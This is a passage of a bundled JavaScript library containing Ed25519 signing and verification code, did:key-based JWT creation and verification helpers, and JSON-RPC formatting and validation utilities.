        const b = s[i / 8 | 0] >> (i & 7) & 1;
        $a1d7ebd43ba0a83c$var$cswap(p, q, b);
        $a1d7ebd43ba0a83c$var$edadd(q, p);
        $a1d7ebd43ba0a83c$var$edadd(p, p);
        $a1d7ebd43ba0a83c$var$cswap(p, q, b);
    }
}
function $a1d7ebd43ba0a83c$var$scalarbase(p, s) {
    const q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    $a1d7ebd43ba0a83c$var$set25519(q[0], $a1d7ebd43ba0a83c$var$X);
    $a1d7ebd43ba0a83c$var$set25519(q[1], $a1d7ebd43ba0a83c$var$Y);
    $a1d7ebd43ba0a83c$var$set25519(q[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$mul(q[3], $a1d7ebd43ba0a83c$var$X, $a1d7ebd43ba0a83c$var$Y);
    $a1d7ebd43ba0a83c$var$scalarmult(p, q, s);
}
// Generates key pair from secret 32-byte seed.
function $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed(seed) {
    if (seed.length !== $a1d7ebd43ba0a83c$exports.SEED_LENGTH) throw new Error(`ed25519: seed must be ${$a1d7ebd43ba0a83c$exports.SEED_LENGTH} bytes`);
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(seed);
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const publicKey = new Uint8Array(32);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    $a1d7ebd43ba0a83c$var$scalarbase(p, d);
    $a1d7ebd43ba0a83c$var$pack(publicKey, p);
    const secretKey = new Uint8Array(64);
    secretKey.set(seed);
    secretKey.set(publicKey, 32);
    return {
        publicKey: publicKey,
        secretKey: secretKey
    };
}
$a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed = $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed;
function $a1d7ebd43ba0a83c$var$generateKeyPair(prng) {
    const seed = (0, $73945d82524e104e$exports.randomBytes)(32, prng);
    const result = $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed(seed);
    (0, $276678191c4bdb56$exports.wipe)(seed);
    return result;
}
$a1d7ebd43ba0a83c$exports.generateKeyPair = $a1d7ebd43ba0a83c$var$generateKeyPair;
function $a1d7ebd43ba0a83c$var$extractPublicKeyFromSecretKey(secretKey) {
    if (secretKey.length !== $a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH) throw new Error(`ed25519: secret key must be ${$a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH} bytes`);
    return new Uint8Array(secretKey.subarray(32));
}
$a1d7ebd43ba0a83c$exports.extractPublicKeyFromSecretKey = $a1d7ebd43ba0a83c$var$extractPublicKeyFromSecretKey;
const $a1d7ebd43ba0a83c$var$L = new Float64Array([
    0xed,
    0xd3,
    0xf5,
    0x5c,
    0x1a,
    0x63,
    0x12,
    0x58,
    0xd6,
    0x9c,
    0xf7,
    0xa2,
    0xde,
    0xf9,
    0xde,
    0x14,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0x10
]);
function $a1d7ebd43ba0a83c$var$modL(r, x) {
    let carry;
    let i;
    let j;
    let k;
    for(i = 63; i >= 32; --i){
        carry = 0;
        for(j = i - 32, k = i - 12; j < k; ++j){
            x[j] += carry - 16 * x[i] * $a1d7ebd43ba0a83c$var$L[j - (i - 32)];
            carry = Math.floor((x[j] + 128) / 256);
            x[j] -= carry * 256;
        }
        x[j] += carry;
        x[i] = 0;
    }
    carry = 0;
    for(j = 0; j < 32; j++){
        x[j] += carry - (x[31] >> 4) * $a1d7ebd43ba0a83c$var$L[j];
        carry = x[j] >> 8;
        x[j] &= 255;
    }
    for(j = 0; j < 32; j++)x[j] -= carry * $a1d7ebd43ba0a83c$var$L[j];
    for(i = 0; i < 32; i++){
        x[i + 1] += x[i] >> 8;
        r[i] = x[i] & 255;
    }
}
function $a1d7ebd43ba0a83c$var$reduce(r) {
    const x = new Float64Array(64);
    for(let i = 0; i < 64; i++)x[i] = r[i];
    for(let i = 0; i < 64; i++)r[i] = 0;
    $a1d7ebd43ba0a83c$var$modL(r, x);
}
// Returns 64-byte signature of the message under the 64-byte secret key.
function $a1d7ebd43ba0a83c$var$sign(secretKey, message) {
    const x = new Float64Array(64);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(secretKey.subarray(0, 32));
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const signature = new Uint8Array(64);
    signature.set(d.subarray(32), 32);
    const hs = new $2cc6b12a8ccb780d$exports.SHA512();
    hs.update(signature.subarray(32));
    hs.update(message);
    const r = hs.digest();
    hs.clean();
    $a1d7ebd43ba0a83c$var$reduce(r);
    $a1d7ebd43ba0a83c$var$scalarbase(p, r);
    $a1d7ebd43ba0a83c$var$pack(signature, p);
    hs.reset();
    hs.update(signature.subarray(0, 32));
    hs.update(secretKey.subarray(32));
    hs.update(message);
    const h = hs.digest();
    $a1d7ebd43ba0a83c$var$reduce(h);
    for(let i = 0; i < 32; i++)x[i] = r[i];
    for(let i = 0; i < 32; i++)for(let j = 0; j < 32; j++)x[i + j] += h[i] * d[j];
    $a1d7ebd43ba0a83c$var$modL(signature.subarray(32), x);
    return signature;
}
$a1d7ebd43ba0a83c$exports.sign = $a1d7ebd43ba0a83c$var$sign;
function $a1d7ebd43ba0a83c$var$unpackneg(r, p) {
    const t = $a1d7ebd43ba0a83c$var$gf(), chk = $a1d7ebd43ba0a83c$var$gf(), num = $a1d7ebd43ba0a83c$var$gf(), den = $a1d7ebd43ba0a83c$var$gf(), den2 = $a1d7ebd43ba0a83c$var$gf(), den4 = $a1d7ebd43ba0a83c$var$gf(), den6 = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$set25519(r[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$unpack25519(r[1], p);
    $a1d7ebd43ba0a83c$var$square(num, r[1]);
    $a1d7ebd43ba0a83c$var$mul(den, num, $a1d7ebd43ba0a83c$var$D);
    $a1d7ebd43ba0a83c$var$sub(num, num, r[2]);
    $a1d7ebd43ba0a83c$var$add(den, r[2], den);
    $a1d7ebd43ba0a83c$var$square(den2, den);
    $a1d7ebd43ba0a83c$var$square(den4, den2);
    $a1d7ebd43ba0a83c$var$mul(den6, den4, den2);
    $a1d7ebd43ba0a83c$var$mul(t, den6, num);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$pow2523(t, t);
    $a1d7ebd43ba0a83c$var$mul(t, t, num);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$mul(r[0], t, den);
    $a1d7ebd43ba0a83c$var$square(chk, r[0]);
    $a1d7ebd43ba0a83c$var$mul(chk, chk, den);
    if ($a1d7ebd43ba0a83c$var$neq25519(chk, num)) $a1d7ebd43ba0a83c$var$mul(r[0], r[0], $a1d7ebd43ba0a83c$var$I);
    $a1d7ebd43ba0a83c$var$square(chk, r[0]);
    $a1d7ebd43ba0a83c$var$mul(chk, chk, den);
    if ($a1d7ebd43ba0a83c$var$neq25519(chk, num)) return -1;
    if ($a1d7ebd43ba0a83c$var$par25519(r[0]) === p[31] >> 7) $a1d7ebd43ba0a83c$var$sub(r[0], $a1d7ebd43ba0a83c$var$gf0, r[0]);
    $a1d7ebd43ba0a83c$var$mul(r[3], r[0], r[1]);
    return 0;
}
function $a1d7ebd43ba0a83c$var$verify(publicKey, message, signature) {
    const t = new Uint8Array(32);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    const q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    if (signature.length !== $a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH) throw new Error(`ed25519: signature must be ${$a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH} bytes`);
    if ($a1d7ebd43ba0a83c$var$unpackneg(q, publicKey)) return false;
    const hs = new $2cc6b12a8ccb780d$exports.SHA512();
    hs.update(signature.subarray(0, 32));
    hs.update(publicKey);
    hs.update(message);
    const h = hs.digest();
    $a1d7ebd43ba0a83c$var$reduce(h);
    $a1d7ebd43ba0a83c$var$scalarmult(p, q, h);
    $a1d7ebd43ba0a83c$var$scalarbase(q, signature.subarray(32));
    $a1d7ebd43ba0a83c$var$edadd(p, q);
    $a1d7ebd43ba0a83c$var$pack(t, p);
    if ($a1d7ebd43ba0a83c$var$verify32(signature, t)) return false;
    return true;
}
$a1d7ebd43ba0a83c$exports.verify = $a1d7ebd43ba0a83c$var$verify;
/**
 * Convert Ed25519 public key to X25519 public key.
 *
 * Throws if given an invalid public key.
 */ function $a1d7ebd43ba0a83c$var$convertPublicKeyToX25519(publicKey) {
    let q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    if ($a1d7ebd43ba0a83c$var$unpackneg(q, publicKey)) throw new Error("Ed25519: invalid public key");
    // Formula: montgomeryX = (edwardsY + 1)*inverse(1 - edwardsY) mod p
    let a = $a1d7ebd43ba0a83c$var$gf();
    let b = $a1d7ebd43ba0a83c$var$gf();
    let y = q[1];
    $a1d7ebd43ba0a83c$var$add(a, $a1d7ebd43ba0a83c$var$gf1, y);
    $a1d7ebd43ba0a83c$var$sub(b, $a1d7ebd43ba0a83c$var$gf1, y);
    $a1d7ebd43ba0a83c$var$inv25519(b, b);
    $a1d7ebd43ba0a83c$var$mul(a, a, b);
    let z = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(z, a);
    return z;
}
$a1d7ebd43ba0a83c$exports.convertPublicKeyToX25519 = $a1d7ebd43ba0a83c$var$convertPublicKeyToX25519;
/**
 *  Convert Ed25519 secret (private) key to X25519 secret key.
 */ function $a1d7ebd43ba0a83c$var$convertSecretKeyToX25519(secretKey) {
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(secretKey.subarray(0, 32));
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const o = new Uint8Array(d.subarray(0, 32));
    (0, $276678191c4bdb56$exports.wipe)(d);
    return o;
}
$a1d7ebd43ba0a83c$exports.convertSecretKeyToX25519 = $a1d7ebd43ba0a83c$var$convertSecretKeyToX25519;




var $aG48A = parcelRequire("aG48A");
const $57cb2bb50a99d8e7$export$51745f7832485c34 = "EdDSA";
const $57cb2bb50a99d8e7$export$f51b45e220f2ba98 = "JWT";
const $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef = ".";
const $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23 = "base64url";
const $57cb2bb50a99d8e7$export$c09c2801e10a2b95 = "utf8";
const $57cb2bb50a99d8e7$export$1e9219c0b91a4257 = "utf8";
const $57cb2bb50a99d8e7$export$d4057275de9d060b = ":";
const $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3 = "did";
const $57cb2bb50a99d8e7$export$b908fe81ccf30934 = "key";
const $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471 = "base58btc";
const $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68 = "z";
const $57cb2bb50a99d8e7$export$9902a33a5776d1fc = "K36";
const $57cb2bb50a99d8e7$export$ca477e91394a742a = 32;
const $57cb2bb50a99d8e7$export$f09ad228919f26fb = 32;







function $f6e90d472e8dfc29$export$2030d1af6cd0ef93(str) {
    return (0, $81c2e06d24b89184$export$84137bb44359aed5)((0, $bdf44057d833ab1f$exports.toString)((0, $a4ed053a1131469e$exports.fromString)(str, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23)), (0, $57cb2bb50a99d8e7$export$c09c2801e10a2b95)));
}
function $f6e90d472e8dfc29$export$84046f8082657cdf(val) {
    return (0, $bdf44057d833ab1f$exports.toString)((0, $a4ed053a1131469e$exports.fromString)((0, $81c2e06d24b89184$export$abc3f407e87918a4)(val), (0, $57cb2bb50a99d8e7$export$c09c2801e10a2b95)), (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$1b29ef9371459e10(publicKey) {
    const header = (0, $a4ed053a1131469e$exports.fromString)((0, $57cb2bb50a99d8e7$export$9902a33a5776d1fc), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    const multicodec = (0, $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68) + (0, $bdf44057d833ab1f$exports.toString)((0, $475c4a512fd4a246$exports.concat)([
        header,
        publicKey
    ]), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    return [
        (0, $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3),
        (0, $57cb2bb50a99d8e7$export$b908fe81ccf30934),
        multicodec
    ].join((0, $57cb2bb50a99d8e7$export$d4057275de9d060b));
}
function $f6e90d472e8dfc29$export$86ac046d72244356(issuer) {
    const [prefix, method, multicodec] = issuer.split((0, $57cb2bb50a99d8e7$export$d4057275de9d060b));
    if (prefix !== (0, $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3) || method !== (0, $57cb2bb50a99d8e7$export$b908fe81ccf30934)) throw new Error(`Issuer must be a DID with method "key"`);
    const base = multicodec.slice(0, 1);
    if (base !== (0, $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68)) throw new Error(`Issuer must be a key in mulicodec format`);
    const bytes = (0, $a4ed053a1131469e$exports.fromString)(multicodec.slice(1), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    const type = (0, $bdf44057d833ab1f$exports.toString)(bytes.slice(0, 2), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    if (type !== (0, $57cb2bb50a99d8e7$export$9902a33a5776d1fc)) throw new Error(`Issuer must be a public key with type "Ed25519"`);
    const publicKey = bytes.slice(2);
    if (publicKey.length !== (0, $57cb2bb50a99d8e7$export$ca477e91394a742a)) throw new Error(`Issuer must be a public key with length 32 bytes`);
    return publicKey;
}
function $f6e90d472e8dfc29$export$d9746ef301b2089b(bytes) {
    return (0, $bdf44057d833ab1f$exports.toString)(bytes, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$c37aeb372ac07c0e(encoded) {
    return (0, $a4ed053a1131469e$exports.fromString)(encoded, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$cfdd1f2478131e3d(params) {
    return (0, $a4ed053a1131469e$exports.fromString)([
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.header),
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.payload)
    ].join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef)), (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257));
}
function $f6e90d472e8dfc29$export$13923bea59211b58(data) {
    const params = (0, $bdf44057d833ab1f$exports.toString)(data, (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257)).split((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
    const header = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[0]);
    const payload = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[1]);
    return {
        header: header,
        payload: payload
    };
}
function $f6e90d472e8dfc29$export$1b70f4551c751d68(params) {
    return [
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.header),
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.payload),
        $f6e90d472e8dfc29$export$d9746ef301b2089b(params.signature)
    ].join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
}
function $f6e90d472e8dfc29$export$9a62e6c0a30e00bc(jwt) {
    const params = jwt.split((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
    const header = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[0]);
    const payload = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[1]);
    const signature = $f6e90d472e8dfc29$export$c37aeb372ac07c0e(params[2]);
    const data = (0, $a4ed053a1131469e$exports.fromString)(params.slice(0, 2).join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef)), (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257));
    return {
        header: header,
        payload: payload,
        signature: signature,
        data: data
    };
}


function $2281914794d9e636$export$a949d36eab55b41f(seed = (0, $73945d82524e104e$exports.randomBytes)((0, $57cb2bb50a99d8e7$export$f09ad228919f26fb))) {
    return $a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed(seed);
}
async function $2281914794d9e636$export$a8dda30659d36d45(sub, aud, ttl, keyPair, iat = (0, $aG48A.fromMiliseconds)(Date.now())) {
    const header = {
        alg: (0, $57cb2bb50a99d8e7$export$51745f7832485c34),
        typ: (0, $57cb2bb50a99d8e7$export$f51b45e220f2ba98)
    };
    const iss = (0, $f6e90d472e8dfc29$export$1b29ef9371459e10)(keyPair.publicKey);
    const exp = iat + ttl;
    const payload = {
        iss: iss,
        sub: sub,
        aud: aud,
        iat: iat,
        exp: exp
    };
    const data = (0, $f6e90d472e8dfc29$export$cfdd1f2478131e3d)({
        header: header,
        payload: payload
    });
    const signature = $a1d7ebd43ba0a83c$exports.sign(keyPair.secretKey, data);
    return (0, $f6e90d472e8dfc29$export$1b70f4551c751d68)({
        header: header,
        payload: payload,
        signature: signature
    });
}
async function $2281914794d9e636$export$7b6fc79aa8c5b79c(jwt) {
    const { header: header, payload: payload, data: data, signature: signature } = (0, $f6e90d472e8dfc29$export$9a62e6c0a30e00bc)(jwt);
    if (header.alg !== (0, $57cb2bb50a99d8e7$export$51745f7832485c34) || header.typ !== (0, $57cb2bb50a99d8e7$export$f51b45e220f2ba98)) throw new Error("JWT must use EdDSA algorithm");
    const publicKey = (0, $f6e90d472e8dfc29$export$86ac046d72244356)(payload.iss);
    return $a1d7ebd43ba0a83c$exports.verify(publicKey, data, signature);
}



var $212b43c5ef62f705$exports = {};



$parcel$exportWildcard($b9995ea5f865dc88$exports, $212b43c5ef62f705$exports);





var $aG48A = parcelRequire("aG48A");

var $7etJZ = parcelRequire("7etJZ");
var $201d0312d0bb8021$exports = {};
$parcel$export($201d0312d0bb8021$exports, "parseConnectionError", () => $ab82c37acb5ed82a$export$f555d7d8f922e407);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcError", () => $21f900087ef2a598$exports.formatJsonRpcError);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcRequest", () => $21f900087ef2a598$exports.formatJsonRpcRequest);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcResult", () => $21f900087ef2a598$exports.formatJsonRpcResult);
$parcel$export($201d0312d0bb8021$exports, "getBigIntRpcId", () => $21f900087ef2a598$exports.getBigIntRpcId);
$parcel$export($201d0312d0bb8021$exports, "IJsonRpcProvider", () => $21f900087ef2a598$exports.IJsonRpcProvider);
$parcel$export($201d0312d0bb8021$exports, "isHttpUrl", () => $21f900087ef2a598$exports.isHttpUrl);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcError", () => $21f900087ef2a598$exports.isJsonRpcError);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcRequest", () => $21f900087ef2a598$exports.isJsonRpcRequest);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResponse", () => $21f900087ef2a598$exports.isJsonRpcResponse);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResult", () => $21f900087ef2a598$exports.isJsonRpcResult);
$parcel$export($201d0312d0bb8021$exports, "isLocalhostUrl", () => $21f900087ef2a598$exports.isLocalhostUrl);
$parcel$export($201d0312d0bb8021$exports, "isReactNative", () => $21f900087ef2a598$exports.isReactNative);
$parcel$export($201d0312d0bb8021$exports, "isWsUrl", () => $21f900087ef2a598$exports.isWsUrl);
$parcel$export($201d0312d0bb8021$exports, "parseConnectionError", () => $21f900087ef2a598$exports.parseConnectionError);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcError", () => $3bb3ddc7bbc938cc$export$9f7302ae26c3f77);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcRequest", () => $3bb3ddc7bbc938cc$export$11d081ebb32d4398);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcResult", () => $3bb3ddc7bbc938cc$export$478fdea01c2a3198);
$parcel$export($201d0312d0bb8021$exports, "getBigIntRpcId", () => $3bb3ddc7bbc938cc$export$799a3db5df197877);
$parcel$export($201d0312d0bb8021$exports, "IJsonRpcProvider", () => $4b3041b8db0f8b25$export$46957420a688a16d);
$parcel$export($201d0312d0bb8021$exports, "isHttpUrl", () => $ceb127018999f416$export$206c3129b8bb1b4f);
$parcel$export($201d0312d0bb8021$exports, "isLocalhostUrl", () => $ceb127018999f416$export$8eb4a0a481601f29);
$parcel$export($201d0312d0bb8021$exports, "isWsUrl", () => $ceb127018999f416$export$4e4463e75eccf20c);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcError", () => $2e45abd1d679ec32$export$5662a1047b4d1d15);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcRequest", () => $2e45abd1d679ec32$export$f6e4034abe07d2a5);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResponse", () => $2e45abd1d679ec32$export$308ba927de2bcbe8);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResult", () => $2e45abd1d679ec32$export$cb3d3b20e3223d77);
const $fb0266a13f89cf1a$export$2ecaad7eb5cc1f25 = "PARSE_ERROR";
const $fb0266a13f89cf1a$export$c77b2f9ece3946ce = "INVALID_REQUEST";
const $fb0266a13f89cf1a$export$e8d537b30db778d6 = "METHOD_NOT_FOUND";
const $fb0266a13f89cf1a$export$13aae195c7978fb1 = "INVALID_PARAMS";
const $fb0266a13f89cf1a$export$f6e3abf3038d348f = "INTERNAL_ERROR";
const $fb0266a13f89cf1a$export$125ebd30471ac25c = "SERVER_ERROR";
const $fb0266a13f89cf1a$export$af84821b5448ca78 = [
    -32700,
    -32600,
    -32601,
    -32602,
    -32603
];
const $fb0266a13f89cf1a$export$fff5b44b15c75f69 = [
    -32000,
    -32099
];
const $fb0266a13f89cf1a$export$cca5387ab287e1ae = {
    [$fb0266a13f89cf1a$export$2ecaad7eb5cc1f25]: {
        code: -32700,
        message: "Parse error"
    },
    [$fb0266a13f89cf1a$export$c77b2f9ece3946ce]: {
        code: -32600,
        message: "Invalid Request"
    },
    [$fb0266a13f89cf1a$export$e8d537b30db778d6]: {
        code: -32601,
        message: "Method not found"
    },
    [$fb0266a13f89cf1a$export$13aae195c7978fb1]: {
        code: -32602,
        message: "Invalid params"
    },
    [$fb0266a13f89cf1a$export$f6e3abf3038d348f]: {
        code: -32603,
        message: "Internal error"
    },
    [$fb0266a13f89cf1a$export$125ebd30471ac25c]: {
        code: -32000,
        message: "Server error"
    }
};
const $fb0266a13f89cf1a$export$d166979eca925bce = $fb0266a13f89cf1a$export$125ebd30471ac25c;



function $ab82c37acb5ed82a$export$e463129eb4bc487f(code) {
    return code <= (0, $fb0266a13f89cf1a$export$fff5b44b15c75f69)[0] && code >= (0, $fb0266a13f89cf1a$export$fff5b44b15c75f69)[1];
}
function $ab82c37acb5ed82a$export$2ae0ec6393ab16c3(code) {
    return (0, $fb0266a13f89cf1a$export$af84821b5448ca78).includes(code);
}
function $ab82c37acb5ed82a$export$7543109e66e1748d(code) {
    return typeof code === "number";
}
function $ab82c37acb5ed82a$export$e1599abf47b5b568(type) {
    if (!Object.keys((0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)).includes(type)) return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce];
    return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[type];
}
function $ab82c37acb5ed82a$export$60a3bac005957e12(code) {
    const match = Object.values((0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)).find((e)=>e.code === code);
    if (!match) return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce];
    return match;
}
function $ab82c37acb5ed82a$export$6be064b82176dd99(response) {
    if (typeof response.error.code === "undefined") return {
        valid: false,
        error: "Missing code for JSON-RPC error"
    };
    if (typeof response.error.message === "undefined") return {
        valid: false,
        error: "Missing message for JSON-RPC error"
    };
    if (!$ab82c37acb5ed82a$export$7543109e66e1748d(response.error.code)) return {
        valid: false,
        error: `Invalid error code type for JSON-RPC: ${response.error.code}`
    };
    if ($ab82c37acb5ed82a$export$2ae0ec6393ab16c3(response.error.code)) {
        const error = $ab82c37acb5ed82a$export$60a3bac005957e12(response.error.code);
        if (error.message !== (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce].message && response.error.message === error.message) return {
            valid: false,
            error: `Invalid error code message for JSON-RPC: ${response.error.code}`
        };
    }
    return {
        valid: true
    };
}
function $ab82c37acb5ed82a$export$f555d7d8f922e407(e, url, type) {
    return e.message.includes("getaddrinfo ENOTFOUND") || e.message.includes("connect ECONNREFUSED") ? new Error(`Unavailable ${type} RPC url at ${url}`) : e;
}


var $21f900087ef2a598$exports = {};
"use strict";
Object.defineProperty($21f900087ef2a598$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("ljFVp")), $21f900087ef2a598$exports);

$7WQrb.__exportStar((parcelRequire("5vmD7")), $21f900087ef2a598$exports);


const $c1abc8a6542d5235$export$d1694901a048d7c8 = (0, $21f900087ef2a598$exports.isNode);




function $3bb3ddc7bbc938cc$export$2f5364a5d4b80251(entropy = 3) {
    const date = Date.now() * Math.pow(10, entropy);
    const extra = Math.floor(Math.random() * Math.pow(10, entropy));
    return date + extra;
}
function $3bb3ddc7bbc938cc$export$799a3db5df197877(entropy = 6) {
    return BigInt($3bb3ddc7bbc938cc$export$2f5364a5d4b80251(entropy));
}
function $3bb3ddc7bbc938cc$export$11d081ebb32d4398(method, params, id) {
    return {
        id: id || $3bb3ddc7bbc938cc$export$2f5364a5d4b80251(),
        jsonrpc: "2.0",
        method: method,
        params: params
    };
}
function $3bb3ddc7bbc938cc$export$478fdea01c2a3198(id, result) {
    return {
        id: id,
        jsonrpc: "2.0",
        result: result
    };
}
function $3bb3ddc7bbc938cc$export$9f7302ae26c3f77(id, error, data) {
    return {
        id: id,
        jsonrpc: "2.0",
        error: $3bb3ddc7bbc938cc$export$5201d50a34753d71(error, data)
    };
}
function $3bb3ddc7bbc938cc$export$5201d50a34753d71(error, data) {
    if (typeof error === "undefined") return (0, $ab82c37acb5ed82a$export$e1599abf47b5b568)((0, $fb0266a13f89cf1a$export$f6e3abf3038d348f));
    if (typeof error === "string") error = Object.assign(Object.assign({}, (0, $ab82c37acb5ed82a$export$e1599abf47b5b568)((0, $fb0266a13f89cf1a$export$125ebd30471ac25c))), {
        message: error
    });
    if (typeof data !== "undefined") error.data = data;
    if ((0, $ab82c37acb5ed82a$export$2ae0ec6393ab16c3)(error.code)) error = (0, $ab82c37acb5ed82a$export$60a3bac005957e12)(error.code);
    return error;
}


function $d805e0076f614f48$export$9f3e656a7f6a3adc(route) {
    if (route.includes("*")) return $d805e0076f614f48$export$8e8b9bea55b56df2(route);
    if (/\W/g.test(route)) return false;
    return true;
}
function $d805e0076f614f48$export$c7e2040809cad2c4(route) {
    return route === "*";
}
function $d805e0076f614f48$export$8e8b9bea55b56df2(route) {
    if ($d805e0076f614f48$export$c7e2040809cad2c4(route)) return true;
    if (!route.includes("*")) return false;
    if (route.split("*").length !== 2) return false;
    if (route.split("*").filter((x)=>x.trim() === "").length !== 1) return false;
    return true;
}
function $d805e0076f614f48$export$2d48faaafcc8fbdc(route) {
    return !$d805e0076f614f48$export$c7e2040809cad2c4(route) && $d805e0076f614f48$export$8e8b9bea55b56df2(route) && !route.split("*")[0].trim();
}
function $d805e0076f614f48$export$be298a4710fab756(route) {
    return !$d805e0076f614f48$export$c7e2040809cad2c4(route) && $d805e0076f614f48$export$8e8b9bea55b56df2(route) && !route.split("*")[1].trim();
}




class $223baefd0cc0a951$export$ab429ec7e240e546 {
}



class $4b3041b8db0f8b25$export$77d426dd89724fbe extends (0, $223baefd0cc0a951$export$ab429ec7e240e546) {
    constructor(opts){
        super();
    }
}
class $4b3041b8db0f8b25$export$cb916a2eed49af33 extends (0, $223baefd0cc0a951$export$ab429ec7e240e546) {
    constructor(){
        super();
    }
}
class $4b3041b8db0f8b25$export$46957420a688a16d extends $4b3041b8db0f8b25$export$cb916a2eed49af33 {
    constructor(connection){
        super();
    }
}








const $ceb127018999f416$var$HTTP_REGEX = "^https?:";
const $ceb127018999f416$var$WS_REGEX = "^wss?:";
function $ceb127018999f416$var$getUrlProtocol(url) {
    const matches = url.match(new RegExp(/^\w+:/, "gi"));
    if (!matches || !matches.length) return;
    return matches[0];
}
function $ceb127018999f416$var$matchRegexProtocol(url, regex) {
